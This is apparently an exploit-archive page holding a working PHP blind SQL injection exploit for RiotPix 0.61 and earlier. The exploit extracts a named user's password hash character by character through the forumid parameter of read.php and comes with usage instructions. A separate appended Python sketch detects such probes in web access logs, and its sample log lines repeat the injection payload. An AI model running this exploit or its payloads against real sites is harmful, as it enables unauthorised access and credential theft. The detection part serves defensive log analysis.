RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
Source: www.vfcocus.net Author: cOndemned Published: 2009-01-07
<?php

/*

$Id: riotpix-0.61.txt,v 0.1 2009/01/06 03:47:30 cOndemned Exp $

RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
Bug found && Exploited by cOndemned

Download :

http://www.riotpix.com/download/riotpix0_61.zip


Description :

It's just a simple Blind SQL Injection exploit that gets
the password hash of a given user. The code is really simple -
without proxy or error handling, but I don't think it is
important, as long as RiotPix isn't a famous script...

-------------------------------------------------------------------

Greetz:

ZaBeaTy, str0ke, sid.psycho & TWT, wojtus0007, 0in, vCore


"...What is left to die for, what is left to give..."

*/


echo "\n[~] RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit";
echo "\n[~] Bug found && Exploited by cOndemned\n";

if($argc != 4)
{
    printf("[!] Usage: php %s <target_size> <username> <topic_id>\n\n", $argv[0]);
    exit;
}

list($sploit, $target, $username, $topicid) = $argv;

$charsArr = array(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102);
$pos = 1;

echo "[~] Password Hash : ";

while($pos != 33)
{
    for($i = 0; $i <= count($charsArr); $i++)
    {
        $query = "/read.php?forumid=$topicid+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='$username'),$pos,1)=CHAR({$charsArr[$i]})--";
        $source = file_get_contents($target . $query);

        if(!eregi('existent', $source))
        {
            printf("%s", chr($charsArr[$i]));
            $pos++;
            break;
        }
        flush(STDOUT);
    }
}

echo "\n[~] Done\n\n";

?>
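
Detection side, as an added example that is not part of the original exploit or of RiotPix: the script above sends up to 16 requests per hash position to /read.php, each with a forumid value that is not a plain integer, so the activity stands out in web server access logs. The Python sketch below flags such requests per client and records which SUBSTRING positions were probed. Assumptions: combined log format, a legitimate forumid is always an integer, and the log lines, addresses and username are constructed samples.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not taken from the page.
SAMPLE_LOG = """\
198.51.100.7 - - [07/Jan/2009:10:00:01 +0000] "GET /read.php?forumid=3 HTTP/1.1" 200 5120
198.51.100.7 - - [07/Jan/2009:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 2048
203.0.113.9 - - [07/Jan/2009:10:00:03 +0000] "GET /read.php?forumid=3+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='admin'),1,1)=CHAR(48)-- HTTP/1.0" 200 812
203.0.113.9 - - [07/Jan/2009:10:00:03 +0000] "GET /read.php?forumid=3+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='admin'),1,1)=CHAR(49)-- HTTP/1.0" 200 5120
203.0.113.9 - - [07/Jan/2009:10:00:04 +0000] "GET /read.php?forumid=3+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='admin'),2,1)=CHAR(48)-- HTTP/1.0" 200 812
"""

# Client address and request target from one combined-format log line.
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Character position argument of a one-character SUBSTRING(...) comparison.
POS = re.compile(r"SUBSTRING\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)", re.I)


def scan(log_text):
    """Return {client: {"probes": n, "positions": [...]}} for non-integer forumid values."""
    hits = defaultdict(lambda: {"probes": 0, "positions": set()})
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/read.php"):
            continue
        # parse_qs decodes '+' and %xx, so encoded variants are normalised first.
        for value in parse_qs(url.query, keep_blank_values=True).get("forumid", []):
            if value.isascii() and value.isdigit():
                continue  # assumption: a legitimate forumid is a plain integer
            hits[client]["probes"] += 1
            pos = POS.search(value)
            if pos:
                hits[client]["positions"].add(int(pos.group(1)))
    return {c: {"probes": h["probes"], "positions": sorted(h["positions"])}
            for c, h in hits.items()}


if __name__ == "__main__":
    for client, info in scan(SAMPLE_LOG).items():
        print(client, info)
```

A client whose probed positions climb steadily towards 32 matches the hash-extraction loop in the script above.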